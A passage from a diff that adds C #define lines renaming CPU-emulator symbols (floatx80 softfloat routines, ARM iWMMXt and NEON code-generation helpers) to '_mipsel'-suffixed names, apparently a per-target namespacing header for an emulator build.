floatx80_mul floatx80_mul_mipsel +#define floatx80_rem floatx80_rem_mipsel +#define floatx80_round_to_int floatx80_round_to_int_mipsel +#define floatx80_scalbn floatx80_scalbn_mipsel +#define floatx80_sqrt floatx80_sqrt_mipsel +#define floatx80_sub floatx80_sub_mipsel +#define floatx80ToCommonNaN floatx80ToCommonNaN_mipsel +#define floatx80_to_float128 floatx80_to_float128_mipsel +#define floatx80_to_float32 floatx80_to_float32_mipsel +#define floatx80_to_float64 floatx80_to_float64_mipsel +#define floatx80_to_int32 floatx80_to_int32_mipsel +#define floatx80_to_int32_round_to_zero floatx80_to_int32_round_to_zero_mipsel +#define floatx80_to_int64 floatx80_to_int64_mipsel +#define floatx80_to_int64_round_to_zero floatx80_to_int64_round_to_zero_mipsel +#define floatx80_unordered floatx80_unordered_mipsel +#define floatx80_unordered_quiet floatx80_unordered_quiet_mipsel +#define flush_icache_range flush_icache_range_mipsel +#define format_string format_string_mipsel +#define fp_decode_rm fp_decode_rm_mipsel +#define frame_dummy frame_dummy_mipsel +#define free_range free_range_mipsel +#define fstat64 fstat64_mipsel +#define futex_wait futex_wait_mipsel +#define futex_wake futex_wake_mipsel +#define gen_aa32_ld16s gen_aa32_ld16s_mipsel +#define gen_aa32_ld16u gen_aa32_ld16u_mipsel +#define gen_aa32_ld32u gen_aa32_ld32u_mipsel +#define gen_aa32_ld64 gen_aa32_ld64_mipsel +#define gen_aa32_ld8s gen_aa32_ld8s_mipsel +#define gen_aa32_ld8u gen_aa32_ld8u_mipsel +#define gen_aa32_st16 gen_aa32_st16_mipsel +#define gen_aa32_st32 gen_aa32_st32_mipsel +#define gen_aa32_st64 gen_aa32_st64_mipsel +#define gen_aa32_st8 gen_aa32_st8_mipsel +#define gen_adc gen_adc_mipsel +#define gen_adc_CC gen_adc_CC_mipsel +#define gen_add16 gen_add16_mipsel +#define gen_add_carry gen_add_carry_mipsel +#define gen_add_CC gen_add_CC_mipsel +#define gen_add_datah_offset gen_add_datah_offset_mipsel +#define gen_add_data_offset gen_add_data_offset_mipsel +#define gen_addq gen_addq_mipsel +#define 
gen_addq_lo gen_addq_lo_mipsel +#define gen_addq_msw gen_addq_msw_mipsel +#define gen_arm_parallel_addsub gen_arm_parallel_addsub_mipsel +#define gen_arm_shift_im gen_arm_shift_im_mipsel +#define gen_arm_shift_reg gen_arm_shift_reg_mipsel +#define gen_bx gen_bx_mipsel +#define gen_bx_im gen_bx_im_mipsel +#define gen_clrex gen_clrex_mipsel +#define generate_memory_topology generate_memory_topology_mipsel +#define generic_timer_cp_reginfo generic_timer_cp_reginfo_mipsel +#define gen_exception gen_exception_mipsel +#define gen_exception_insn gen_exception_insn_mipsel +#define gen_exception_internal gen_exception_internal_mipsel +#define gen_exception_internal_insn gen_exception_internal_insn_mipsel +#define gen_exception_return gen_exception_return_mipsel +#define gen_goto_tb gen_goto_tb_mipsel +#define gen_helper_access_check_cp_reg gen_helper_access_check_cp_reg_mipsel +#define gen_helper_add_saturate gen_helper_add_saturate_mipsel +#define gen_helper_add_setq gen_helper_add_setq_mipsel +#define gen_helper_clear_pstate_ss gen_helper_clear_pstate_ss_mipsel +#define gen_helper_clz32 gen_helper_clz32_mipsel +#define gen_helper_clz64 gen_helper_clz64_mipsel +#define gen_helper_clz_arm gen_helper_clz_arm_mipsel +#define gen_helper_cpsr_read gen_helper_cpsr_read_mipsel +#define gen_helper_cpsr_write gen_helper_cpsr_write_mipsel +#define gen_helper_crc32_arm gen_helper_crc32_arm_mipsel +#define gen_helper_crc32c gen_helper_crc32c_mipsel +#define gen_helper_crypto_aese gen_helper_crypto_aese_mipsel +#define gen_helper_crypto_aesmc gen_helper_crypto_aesmc_mipsel +#define gen_helper_crypto_sha1_3reg gen_helper_crypto_sha1_3reg_mipsel +#define gen_helper_crypto_sha1h gen_helper_crypto_sha1h_mipsel +#define gen_helper_crypto_sha1su1 gen_helper_crypto_sha1su1_mipsel +#define gen_helper_crypto_sha256h gen_helper_crypto_sha256h_mipsel +#define gen_helper_crypto_sha256h2 gen_helper_crypto_sha256h2_mipsel +#define gen_helper_crypto_sha256su0 gen_helper_crypto_sha256su0_mipsel 
+#define gen_helper_crypto_sha256su1 gen_helper_crypto_sha256su1_mipsel +#define gen_helper_double_saturate gen_helper_double_saturate_mipsel +#define gen_helper_exception_internal gen_helper_exception_internal_mipsel +#define gen_helper_exception_with_syndrome gen_helper_exception_with_syndrome_mipsel +#define gen_helper_get_cp_reg gen_helper_get_cp_reg_mipsel +#define gen_helper_get_cp_reg64 gen_helper_get_cp_reg64_mipsel +#define gen_helper_get_r13_banked gen_helper_get_r13_banked_mipsel +#define gen_helper_get_user_reg gen_helper_get_user_reg_mipsel +#define gen_helper_iwmmxt_addcb gen_helper_iwmmxt_addcb_mipsel +#define gen_helper_iwmmxt_addcl gen_helper_iwmmxt_addcl_mipsel +#define gen_helper_iwmmxt_addcw gen_helper_iwmmxt_addcw_mipsel +#define gen_helper_iwmmxt_addnb gen_helper_iwmmxt_addnb_mipsel +#define gen_helper_iwmmxt_addnl gen_helper_iwmmxt_addnl_mipsel +#define gen_helper_iwmmxt_addnw gen_helper_iwmmxt_addnw_mipsel +#define gen_helper_iwmmxt_addsb gen_helper_iwmmxt_addsb_mipsel +#define gen_helper_iwmmxt_addsl gen_helper_iwmmxt_addsl_mipsel +#define gen_helper_iwmmxt_addsw gen_helper_iwmmxt_addsw_mipsel +#define gen_helper_iwmmxt_addub gen_helper_iwmmxt_addub_mipsel +#define gen_helper_iwmmxt_addul gen_helper_iwmmxt_addul_mipsel +#define gen_helper_iwmmxt_adduw gen_helper_iwmmxt_adduw_mipsel +#define gen_helper_iwmmxt_align gen_helper_iwmmxt_align_mipsel +#define gen_helper_iwmmxt_avgb0 gen_helper_iwmmxt_avgb0_mipsel +#define gen_helper_iwmmxt_avgb1 gen_helper_iwmmxt_avgb1_mipsel +#define gen_helper_iwmmxt_avgw0 gen_helper_iwmmxt_avgw0_mipsel +#define gen_helper_iwmmxt_avgw1 gen_helper_iwmmxt_avgw1_mipsel +#define gen_helper_iwmmxt_bcstb gen_helper_iwmmxt_bcstb_mipsel +#define gen_helper_iwmmxt_bcstl gen_helper_iwmmxt_bcstl_mipsel +#define gen_helper_iwmmxt_bcstw gen_helper_iwmmxt_bcstw_mipsel +#define gen_helper_iwmmxt_cmpeqb gen_helper_iwmmxt_cmpeqb_mipsel +#define gen_helper_iwmmxt_cmpeql gen_helper_iwmmxt_cmpeql_mipsel +#define 
gen_helper_iwmmxt_cmpeqw gen_helper_iwmmxt_cmpeqw_mipsel +#define gen_helper_iwmmxt_cmpgtsb gen_helper_iwmmxt_cmpgtsb_mipsel +#define gen_helper_iwmmxt_cmpgtsl gen_helper_iwmmxt_cmpgtsl_mipsel +#define gen_helper_iwmmxt_cmpgtsw gen_helper_iwmmxt_cmpgtsw_mipsel +#define gen_helper_iwmmxt_cmpgtub gen_helper_iwmmxt_cmpgtub_mipsel +#define gen_helper_iwmmxt_cmpgtul gen_helper_iwmmxt_cmpgtul_mipsel +#define gen_helper_iwmmxt_cmpgtuw gen_helper_iwmmxt_cmpgtuw_mipsel +#define gen_helper_iwmmxt_insr gen_helper_iwmmxt_insr_mipsel +#define gen_helper_iwmmxt_macsw gen_helper_iwmmxt_macsw_mipsel +#define gen_helper_iwmmxt_macuw gen_helper_iwmmxt_macuw_mipsel +#define gen_helper_iwmmxt_maddsq gen_helper_iwmmxt_maddsq_mipsel +#define gen_helper_iwmmxt_madduq gen_helper_iwmmxt_madduq_mipsel +#define gen_helper_iwmmxt_maxsb gen_helper_iwmmxt_maxsb_mipsel +#define gen_helper_iwmmxt_maxsl gen_helper_iwmmxt_maxsl_mipsel +#define gen_helper_iwmmxt_maxsw gen_helper_iwmmxt_maxsw_mipsel +#define gen_helper_iwmmxt_maxub gen_helper_iwmmxt_maxub_mipsel +#define gen_helper_iwmmxt_maxul gen_helper_iwmmxt_maxul_mipsel +#define gen_helper_iwmmxt_maxuw gen_helper_iwmmxt_maxuw_mipsel +#define gen_helper_iwmmxt_minsb gen_helper_iwmmxt_minsb_mipsel +#define gen_helper_iwmmxt_minsl gen_helper_iwmmxt_minsl_mipsel +#define gen_helper_iwmmxt_minsw gen_helper_iwmmxt_minsw_mipsel +#define gen_helper_iwmmxt_minub gen_helper_iwmmxt_minub_mipsel +#define gen_helper_iwmmxt_minul gen_helper_iwmmxt_minul_mipsel +#define gen_helper_iwmmxt_minuw gen_helper_iwmmxt_minuw_mipsel +#define gen_helper_iwmmxt_msbb gen_helper_iwmmxt_msbb_mipsel +#define gen_helper_iwmmxt_msbl gen_helper_iwmmxt_msbl_mipsel +#define gen_helper_iwmmxt_msbw gen_helper_iwmmxt_msbw_mipsel +#define gen_helper_iwmmxt_muladdsl gen_helper_iwmmxt_muladdsl_mipsel +#define gen_helper_iwmmxt_muladdsw gen_helper_iwmmxt_muladdsw_mipsel +#define gen_helper_iwmmxt_muladdswl gen_helper_iwmmxt_muladdswl_mipsel +#define gen_helper_iwmmxt_mulshw 
gen_helper_iwmmxt_mulshw_mipsel +#define gen_helper_iwmmxt_mulslw gen_helper_iwmmxt_mulslw_mipsel +#define gen_helper_iwmmxt_muluhw gen_helper_iwmmxt_muluhw_mipsel +#define gen_helper_iwmmxt_mululw gen_helper_iwmmxt_mululw_mipsel +#define gen_helper_iwmmxt_packsl gen_helper_iwmmxt_packsl_mipsel +#define gen_helper_iwmmxt_packsq gen_helper_iwmmxt_packsq_mipsel +#define gen_helper_iwmmxt_packsw gen_helper_iwmmxt_packsw_mipsel +#define gen_helper_iwmmxt_packul gen_helper_iwmmxt_packul_mipsel +#define gen_helper_iwmmxt_packuq gen_helper_iwmmxt_packuq_mipsel +#define gen_helper_iwmmxt_packuw gen_helper_iwmmxt_packuw_mipsel +#define gen_helper_iwmmxt_rorl gen_helper_iwmmxt_rorl_mipsel +#define gen_helper_iwmmxt_rorq gen_helper_iwmmxt_rorq_mipsel +#define gen_helper_iwmmxt_rorw gen_helper_iwmmxt_rorw_mipsel +#define gen_helper_iwmmxt_sadb gen_helper_iwmmxt_sadb_mipsel +#define gen_helper_iwmmxt_sadw gen_helper_iwmmxt_sadw_mipsel +#define gen_helper_iwmmxt_setpsr_nz gen_helper_iwmmxt_setpsr_nz_mipsel +#define gen_helper_iwmmxt_shufh gen_helper_iwmmxt_shufh_mipsel +#define gen_helper_iwmmxt_slll gen_helper_iwmmxt_slll_mipsel +#define gen_helper_iwmmxt_sllq gen_helper_iwmmxt_sllq_mipsel +#define gen_helper_iwmmxt_sllw gen_helper_iwmmxt_sllw_mipsel +#define gen_helper_iwmmxt_sral gen_helper_iwmmxt_sral_mipsel +#define gen_helper_iwmmxt_sraq gen_helper_iwmmxt_sraq_mipsel +#define gen_helper_iwmmxt_sraw gen_helper_iwmmxt_sraw_mipsel +#define gen_helper_iwmmxt_srll gen_helper_iwmmxt_srll_mipsel +#define gen_helper_iwmmxt_srlq gen_helper_iwmmxt_srlq_mipsel +#define gen_helper_iwmmxt_srlw gen_helper_iwmmxt_srlw_mipsel +#define gen_helper_iwmmxt_subnb gen_helper_iwmmxt_subnb_mipsel +#define gen_helper_iwmmxt_subnl gen_helper_iwmmxt_subnl_mipsel +#define gen_helper_iwmmxt_subnw gen_helper_iwmmxt_subnw_mipsel +#define gen_helper_iwmmxt_subsb gen_helper_iwmmxt_subsb_mipsel +#define gen_helper_iwmmxt_subsl gen_helper_iwmmxt_subsl_mipsel +#define gen_helper_iwmmxt_subsw 
gen_helper_iwmmxt_subsw_mipsel +#define gen_helper_iwmmxt_subub gen_helper_iwmmxt_subub_mipsel +#define gen_helper_iwmmxt_subul gen_helper_iwmmxt_subul_mipsel +#define gen_helper_iwmmxt_subuw gen_helper_iwmmxt_subuw_mipsel +#define gen_helper_iwmmxt_unpackhb gen_helper_iwmmxt_unpackhb_mipsel +#define gen_helper_iwmmxt_unpackhl gen_helper_iwmmxt_unpackhl_mipsel +#define gen_helper_iwmmxt_unpackhsb gen_helper_iwmmxt_unpackhsb_mipsel +#define gen_helper_iwmmxt_unpackhsl gen_helper_iwmmxt_unpackhsl_mipsel +#define gen_helper_iwmmxt_unpackhsw gen_helper_iwmmxt_unpackhsw_mipsel +#define gen_helper_iwmmxt_unpackhub gen_helper_iwmmxt_unpackhub_mipsel +#define gen_helper_iwmmxt_unpackhul gen_helper_iwmmxt_unpackhul_mipsel +#define gen_helper_iwmmxt_unpackhuw gen_helper_iwmmxt_unpackhuw_mipsel +#define gen_helper_iwmmxt_unpackhw gen_helper_iwmmxt_unpackhw_mipsel +#define gen_helper_iwmmxt_unpacklb gen_helper_iwmmxt_unpacklb_mipsel +#define gen_helper_iwmmxt_unpackll gen_helper_iwmmxt_unpackll_mipsel +#define gen_helper_iwmmxt_unpacklsb gen_helper_iwmmxt_unpacklsb_mipsel +#define gen_helper_iwmmxt_unpacklsl gen_helper_iwmmxt_unpacklsl_mipsel +#define gen_helper_iwmmxt_unpacklsw gen_helper_iwmmxt_unpacklsw_mipsel +#define gen_helper_iwmmxt_unpacklub gen_helper_iwmmxt_unpacklub_mipsel +#define gen_helper_iwmmxt_unpacklul gen_helper_iwmmxt_unpacklul_mipsel +#define gen_helper_iwmmxt_unpackluw gen_helper_iwmmxt_unpackluw_mipsel +#define gen_helper_iwmmxt_unpacklw gen_helper_iwmmxt_unpacklw_mipsel +#define gen_helper_neon_abd_f32 gen_helper_neon_abd_f32_mipsel +#define gen_helper_neon_abdl_s16 gen_helper_neon_abdl_s16_mipsel +#define gen_helper_neon_abdl_s32 gen_helper_neon_abdl_s32_mipsel +#define gen_helper_neon_abdl_s64 gen_helper_neon_abdl_s64_mipsel +#define gen_helper_neon_abdl_u16 gen_helper_neon_abdl_u16_mipsel +#define gen_helper_neon_abdl_u32 gen_helper_neon_abdl_u32_mipsel +#define gen_helper_neon_abdl_u64 gen_helper_neon_abdl_u64_mipsel +#define gen_helper_neon_abd_s16 
gen_helper_neon_abd_s16_mipsel +#define gen_helper_neon_abd_s32 gen_helper_neon_abd_s32_mipsel +#define gen_helper_neon_abd_s8 gen_helper_neon_abd_s8_mipsel +#define gen_helper_neon_abd_u16 gen_helper_neon_abd_u16_mipsel +#define gen_helper_neon_abd_u32 gen_helper_neon_abd_u32_mipsel +#define gen_helper_neon_abd_u8 gen_helper_neon_abd_u8_mipsel +#define gen_helper_neon_abs_s16 gen_helper_neon_abs_s16_mipsel +#define gen_helper_neon_abs_s8 gen_helper_neon_abs_s8_mipsel +#define gen_helper_neon_acge_f32 gen_helper_neon_acge_f32_mipsel +#define gen_helper_neon_acgt_f32 gen_helper_neon_acgt_f32_mipsel +#define gen_helper_neon_addl_saturate_s32 gen_helper_neon_addl_saturate_s32_mipsel +#define gen_helper_neon_addl_saturate_s64 gen_helper_neon_addl_saturate_s64_mipsel +#define gen_helper_neon_addl_u16 gen_helper_neon_addl_u16_mipsel +#define gen_helper_neon_addl_u32 gen_helper_neon_addl_u32_mipsel +#define gen_helper_neon_add_u16 gen_helper_neon_add_u16_mipsel +#define gen_helper_neon_add_u8 gen_helper_neon_add_u8_mipsel +#define gen_helper_neon_ceq_f32 gen_helper_neon_ceq_f32_mipsel +#define gen_helper_neon_ceq_u16 gen_helper_neon_ceq_u16_mipsel +#define gen_helper_neon_ceq_u32 gen_helper_neon_ceq_u32_mipsel +#define gen_helper_neon_ceq_u8 gen_helper_neon_ceq_u8_mipsel +#define gen_helper_neon_cge_f32 gen_helper_neon_cge_f32_mipsel +#define gen_helper_neon_cge_s16 gen_helper_neon_cge_s16_mipsel +#define gen_helper_neon_cge_s32 gen_helper_neon_cge_s32_mipsel +#define gen_helper_neon_cge_s8 gen_helper_neon_cge_s8_mipsel +#define gen_helper_neon_cge_u16 gen_helper_neon_cge_u16_mipsel +#define gen_helper_neon_cge_u32 gen_helper_neon_cge_u32_mipsel +#define gen_helper_neon_cge_u8 gen_helper_neon_cge_u8_mipsel +#define gen_helper_neon_cgt_f32 gen_helper_neon_cgt_f32_mipsel +#define gen_helper_neon_cgt_s16 gen_helper_neon_cgt_s16_mipsel +#define gen_helper_neon_cgt_s32 gen_helper_neon_cgt_s32_mipsel +#define gen_helper_neon_cgt_s8 gen_helper_neon_cgt_s8_mipsel +#define 
gen_helper_neon_cgt_u16 gen_helper_neon_cgt_u16_mipsel +#define gen_helper_neon_cgt_u32 gen_helper_neon_cgt_u32_mipsel +#define gen_helper_neon_cgt_u8 gen_helper_neon_cgt_u8_mipsel +#define gen_helper_neon_cls_s16 gen_helper_neon_cls_s16_mipsel +#define gen_helper_neon_cls_s32 gen_helper_neon_cls_s32_mipsel +#define gen_helper_neon_cls_s8 gen_helper_neon_cls_s8_mipsel +#define gen_helper_neon_clz_u16 gen_helper_neon_clz_u16_mipsel +#define gen_helper_neon_clz_u8 gen_helper_neon_clz_u8_mipsel +#define gen_helper_neon_cnt_u8 gen_helper_neon_cnt_u8_mipsel +#define gen_helper_neon_fcvt_f16_to_f32 gen_helper_neon_fcvt_f16_to_f32_mipsel +#define gen_helper_neon_fcvt_f32_to_f16 gen_helper_neon_fcvt_f32_to_f16_mipsel +#define gen_helper_neon_hadd_s16 gen_helper_neon_hadd_s16_mipsel +#define gen_helper_neon_hadd_s32 gen_helper_neon_hadd_s32_mipsel +#define gen_helper_neon_hadd_s8 gen_helper_neon_hadd_s8_mipsel +#define gen_helper_neon_hadd_u16 gen_helper_neon_hadd_u16_mipsel +#define gen_helper_neon_hadd_u32 gen_helper_neon_hadd_u32_mipsel +#define gen_helper_neon_hadd_u8 gen_helper_neon_hadd_u8_mipsel +#define gen_helper_neon_hsub_s16 gen_helper_neon_hsub_s16_mipsel +#define gen_helper_neon_hsub_s32 gen_helper_neon_hsub_s32_mipsel +#define gen_helper_neon_hsub_s8 gen_helper_neon_hsub_s8_mipsel +#define gen_helper_neon_hsub_u16 gen_helper_neon_hsub_u16_mipsel +#define gen_helper_neon_hsub_u32 gen_helper_neon_hsub_u32_mipsel +#define gen_helper_neon_hsub_u8 gen_helper_neon_hsub_u8_mipsel +#define gen_helper_neon_max_s16 gen_helper_neon_max_s16_mipsel +#define gen_helper_neon_max_s32 gen_helper_neon_max_s32_mipsel +#define gen_helper_neon_max_s8 gen_helper_neon_max_s8_mipsel +#define gen_helper_neon_max_u16 gen_helper_neon_max_u16_mipsel +#define gen_helper_neon_max_u32 gen_helper_neon_max_u32_mipsel +#define gen_helper_neon_max_u8 gen_helper_neon_max_u8_mipsel +#define gen_helper_neon_min_s16 gen_helper_neon_min_s16_mipsel +#define gen_helper_neon_min_s32 
gen_helper_neon_min_s32_mipsel +#define gen_helper_neon_min_s8 gen_helper_neon_min_s8_mipsel +#define gen_helper_neon_min_u16 gen_helper_neon_min_u16_mipsel +#define gen_helper_neon_min_u32 gen_helper_neon_min_u32_mipsel +#define gen_helper_neon_min_u8 gen_helper_neon_min_u8_mipsel +#define gen_helper_neon_mull_p8 gen_helper_neon_mull_p8_mipsel +#define gen_helper_neon_mull_s16 gen_helper_neon_mull_s16_mipsel +#define gen_helper_neon_mull_s8 gen_helper_neon_mull_s8_mipsel +#define gen_helper_neon_mull_u16 gen_helper_neon_mull_u16_mipsel +#define gen_helper_neon_mull_u8 gen_helper_neon_mull_u8_mipsel +#define gen_helper_neon_mul_p8 gen_helper_neon_mul_p8_mipsel +#define gen_helper_neon_mul_u16 gen_helper_neon_mul_u16_mipsel +#define gen_helper_neon_mul_u8 gen_helper_neon_mul_u8_mipsel +#define gen_helper_neon_narrow_high_u16 gen_helper_neon_narrow_high_u16_mipsel +#define gen_helper_neon_narrow_high_u8 gen_helper_neon_narrow_high_u8_mipsel +#define gen_helper_neon_narrow_round_high_u16 gen_helper_neon_narrow_round_high_u16_mipsel +#define gen_helper_neon_narrow_round_high_u8 gen_helper_neon_narrow_round_high_u8_mipsel +#define gen_helper_neon_narrow_sat_s16 gen_helper_neon_narrow_sat_s16_mipsel +#define gen_helper_neon_narrow_sat_s32 gen_helper_neon_narrow_sat_s32_mipsel +#define gen_helper_neon_narrow_sat_s8 gen_helper_neon_narrow_sat_s8_mipsel +#define gen_helper_neon_narrow_sat_u16 gen_helper_neon_narrow_sat_u16_mipsel +#define gen_helper_neon_narrow_sat_u32 gen_helper_neon_narrow_sat_u32_mipsel +#define gen_helper_neon_narrow_sat_u8 gen_helper_neon_narrow_sat_u8_mipsel +#define gen_helper_neon_narrow_u16 gen_helper_neon_narrow_u16_mipsel +#define gen_helper_neon_narrow_u8 gen_helper_neon_narrow_u8_mipsel +#define gen_helper_neon_negl_u16 gen_helper_neon_negl_u16_mipsel +#define gen_helper_neon_negl_u32 gen_helper_neon_negl_u32_mipsel +#define gen_helper_neon_paddl_u16 gen_helper_neon_paddl_u16_mipsel +#define gen_helper_neon_paddl_u32 
gen_helper_neon_paddl_u32_mipsel +#define gen_helper_neon_padd_u16 gen_helper_neon_padd_u16_mipsel +#define gen_helper_neon_padd_u8 gen_helper_neon_padd_u8_mipsel +#define gen_helper_neon_pmax_s16 gen_helper_neon_pmax_s16_mipsel +#define gen_helper_neon_pmax_s8 gen_helper_neon_pmax_s8_mipsel +#define gen_helper_neon_pmax_u16 gen_helper_neon_pmax_u16_mipsel +#define gen_helper_neon_pmax_u8 gen_helper_neon_pmax_u8_mipsel +#define gen_helper_neon_pmin_s16 gen_helper_neon_pmin_s16_mipsel +#define gen_helper_neon_pmin_s8 gen_helper_neon_pmin_s8_mipsel +#define gen_helper_neon_pmin_u16 gen_helper_neon_pmin_u16_mipsel +#define gen_helper_neon_pmin_u8 gen_helper_neon_pmin_u8_mipsel +#define gen_helper_neon_pmull_64_hi gen_helper_neon_pmull_64_hi_mipsel +#define gen_helper_neon_pmull_64_lo gen_helper_neon_pmull_64_lo_mipsel +#define gen_helper_neon_qabs_s16 gen_helper_neon_qabs_s16_mipsel +#define gen_helper_neon_qabs_s32 gen_helper_neon_qabs_s32_mipsel +#define gen_helper_neon_qabs_s8 gen_helper_neon_qabs_s8_mipsel +#define gen_helper_neon_qadd_s16 gen_helper_neon_qadd_s16_mipsel +#define gen_helper_neon_qadd_s32 gen_helper_neon_qadd_s32_mipsel +#define gen_helper_neon_qadd_s64 gen_helper_neon_qadd_s64_mipsel +#define gen_helper_neon_qadd_s8 gen_helper_neon_qadd_s8_mipsel +#define gen_helper_neon_qadd_u16 gen_helper_neon_qadd_u16_mipsel +#define gen_helper_neon_qadd_u32 gen_helper_neon_qadd_u32_mipsel +#define gen_helper_neon_qadd_u64 gen_helper_neon_qadd_u64_mipsel +#define gen_helper_neon_qadd_u8 gen_helper_neon_qadd_u8_mipsel +#define gen_helper_neon_qdmulh_s16 gen_helper_neon_qdmulh_s16_mipsel +#define gen_helper_neon_qdmulh_s32 gen_helper_neon_qdmulh_s32_mipsel +#define gen_helper_neon_qneg_s16 gen_helper_neon_qneg_s16_mipsel +#define gen_helper_neon_qneg_s32 gen_helper_neon_qneg_s32_mipsel +#define gen_helper_neon_qneg_s8 gen_helper_neon_qneg_s8_mipsel +#define gen_helper_neon_qrdmulh_s16 gen_helper_neon_qrdmulh_s16_mipsel +#define gen_helper_neon_qrdmulh_s32 
gen_helper_neon_qrdmulh_s32_mipsel +#define gen_helper_neon_qrshl_s16 gen_helper_neon_qrshl_s16_mipsel +#define gen_helper_neon_qrshl_s32 gen_helper_neon_qrshl_s32_mipsel +#define gen_helper_neon_qrshl_s64 gen_helper_neon_qrshl_s64_mipsel +#define gen_helper_neon_qrshl_s8 gen_helper_neon_qrshl_s8_mipsel +#define gen_helper_neon_qrshl_u16 gen_helper_neon_qrshl_u16_mipsel +#define gen_helper_neon_qrshl_u32 gen_helper_neon_qrshl_u32_mipsel +#define gen_helper_neon_qrshl_u64 gen_helper_neon_qrshl_u64_mipsel +#define gen_helper_neon_qrshl_u8 gen_helper_neon_qrshl_u8_mipsel +#define gen_helper_neon_qshl_s16 gen_helper_neon_qshl_s16_mipsel +#define gen_helper_neon_qshl_s32 gen_helper_neon_qshl_s32_mipsel +#define gen_helper_neon_qshl_s64 gen_helper_neon_qshl_s64_mipsel +#define gen_helper_neon_qshl_s8 gen_helper_neon_qshl_s8_mipsel +#define gen_helper_neon_qshl_u16 gen_helper_neon_qshl_u16_mipsel +#define gen_helper_neon_qshl_u32 gen_helper_neon_qshl_u32_mipsel +#define gen_helper_neon_qshl_u64 gen_helper_neon_qshl_u64_mipsel +#define gen_helper_neon_qshl_u8 gen_helper_neon_qshl_u8_mipsel +#define gen_helper_neon_qshlu_s16 gen_helper_neon_qshlu_s16_mipsel +#define gen_helper_neon_qshlu_s32 gen_helper_neon_qshlu_s32_mipsel +#define gen_helper_neon_qshlu_s64 gen_helper_neon_qshlu_s64_mipsel +#define gen_helper_neon_qshlu_s8 gen_helper_neon_qshlu_s8_mipsel +#define gen_helper_neon_qsub_s16 gen_helper_neon_qsub_s16_mipsel +#define gen_helper_neon_qsub_s32 gen_helper_neon_qsub_s32_mipsel +#define gen_helper_neon_qsub_s64 gen_helper_neon_qsub_s64_mipsel +#define gen_helper_neon_qsub_s8 gen_helper_neon_qsub_s8_mipsel +#define gen_helper_neon_qsub_u16 gen_helper_neon_qsub_u16_mipsel +#define gen_helper_neon_qsub_u32 gen_helper_neon_qsub_u32_mipsel +#define gen_helper_neon_qsub_u64 gen_helper_neon_qsub_u64_mipsel +#define gen_helper_neon_qsub_u8 gen_helper_neon_qsub_u8_mipsel +#define gen_helper_neon_qunzip16 gen_helper_neon_qunzip16_mipsel +#define gen_helper_neon_qunzip32 
gen_helper_neon_qunzip32_mipsel +#define gen_helper_neon_qunzip8 gen_helper_neon_qunzip8_mipsel +#define gen_helper_neon_qzip16 gen_helper_neon_qzip16_mipsel +#define gen_helper_neon_qzip32 gen_helper_neon_qzip32_mipsel +#define gen_helper_neon_qzip8 gen_helper_neon_qzip8_mipsel +#define gen_helper_neon_rhadd_s16 gen_helper_neon_rhadd_s16_mipsel +#define gen_helper_neon_rhadd_s32 gen_helper_neon_rhadd_s32_mipsel +#define gen_helper_neon_rhadd_s8 gen_helper_neon_rhadd_s8_mipsel +#define gen_helper_neon_rhadd_u16 gen_helper_neon_rhadd_u16_mipsel +#define gen_helper_neon_rhadd_u32 gen_helper_neon_rhadd_u32_mipsel +#define gen_helper_neon_rhadd_u8 gen_helper_neon_rhadd_u8_mipsel +#define gen_helper_neon_rshl_s16 gen_helper_neon_rshl_s16_mipsel +#define gen_helper_neon_rshl_s32 gen_helper_neon_rshl_s32_mipsel +#define gen_helper_neon_rshl_s64 gen_helper_neon_rshl_s64_mipsel +#define gen_helper_neon_rshl_s8 gen_helper_neon_rshl_s8_mipsel +#define gen_helper_neon_rshl_u16 gen_helper_neon_rshl_u16_mipsel +#define gen_helper_neon_rshl_u32 gen_helper_neon_rshl_u32_mipsel +#define gen_helper_neon_rshl_u64 gen_helper_neon_rshl_u64_mipsel +#define gen_helper_neon_rshl_u8 gen_helper_neon_rshl_u8_mipsel +#define gen_helper_neon_shl_s16 gen_helper_neon_shl_s16_mipsel +#define gen_helper_neon_shl_s32 gen_helper_neon_shl_s32_mipsel +#define gen_helper_neon_shl_s64 gen_helper_neon_shl_s64_mipsel +#define gen_helper_neon_shl_s8 gen_helper_neon_shl_s8_mipsel +#define gen_helper_neon_shl_u16 gen_helper_neon_shl_u16_mipsel +#define gen_helper_neon_shl_u32 gen_helper_neon_shl_u32_mipsel +#define gen_helper_neon_shl_u64 gen_helper_neon_shl_u64_mipsel +#define gen_helper_neon_shl_u8 gen_helper_neon_shl_u8_mipsel +#define gen_helper_neon_subl_u16 gen_helper_neon_subl_u16_mipsel +#define gen_helper_neon_subl_u32 gen_helper_neon_subl_u32_mipsel +#define gen_helper_neon_sub_u16 gen_helper_neon_sub_u16_mipsel +#define gen_helper_neon_sub_u8 gen_helper_neon_sub_u8_mipsel +#define 
gen_helper_neon_tbl gen_helper_neon_tbl_mipsel +#define gen_helper_neon_tst_u16 gen_helper_neon_tst_u16_mipsel +#define gen_helper_neon_tst_u32 gen_helper_neon_tst_u32_mipsel +#define gen_helper_neon_tst_u8 gen_helper_neon_tst_u8_mipsel +#define gen_helper_neon_unarrow_sat16 gen_helper_neon_unarrow_sat16_mipsel +#define gen_helper_neon_unarrow_sat32 gen_helper_neon_unarrow_sat32_mipsel +#define gen_helper_neon_unarrow_sat8 gen_helper_neon_unarrow_sat8_mipsel +#define gen_helper_neon_unzip16 gen_helper_neon_unzip16_mipsel +#define gen_helper_neon_unzip8 gen_helper_neon_unzip8_mipsel +#define gen_helper_neon_widen_s16 gen_helper_neon_widen_s16_mipsel +#define gen_helper_neon_widen_s8 gen_helper_neon_widen_s8_mipsel +#define gen_helper_neon_widen_u16 gen_helper_neon_widen_u16_mipsel +#define gen_helper_neon_widen_u8 gen_helper_neon_widen_u8_mipsel +#define gen_helper_neon_zip16 gen_helper_neon_zip16_mipsel +#define gen_helper_neon_zip8 gen_helper_neon_zip8_mipsel +#define gen_helper_pre_hvc gen_helper_pre_hvc_mipsel +#define gen_helper_pre_smc gen_helper_pre_smc_mipsel +#define gen_helper_qadd16 gen_helper_qadd16_mipsel +#define gen_helper_qadd8 gen_helper_qadd8_mipsel +#define gen_helper_qaddsubx gen_helper_qaddsubx_mipsel +#define gen_helper_qsub16 gen_helper_qsub16_mipsel +#define gen_helper_qsub8 gen_helper_qsub8_mipsel +#define gen_helper_qsubaddx gen_helper_qsubaddx_mipsel +#define gen_helper_rbit gen_helper_rbit_mipsel +#define gen_helper_recpe_f32 gen_helper_recpe_f32_mipsel +#define gen_helper_recpe_u32 gen_helper_recpe_u32_mipsel +#define gen_helper_recps_f32 gen_helper_recps_f32_mipsel +#define gen_helper_rintd gen_helper_rintd_mipsel +#define 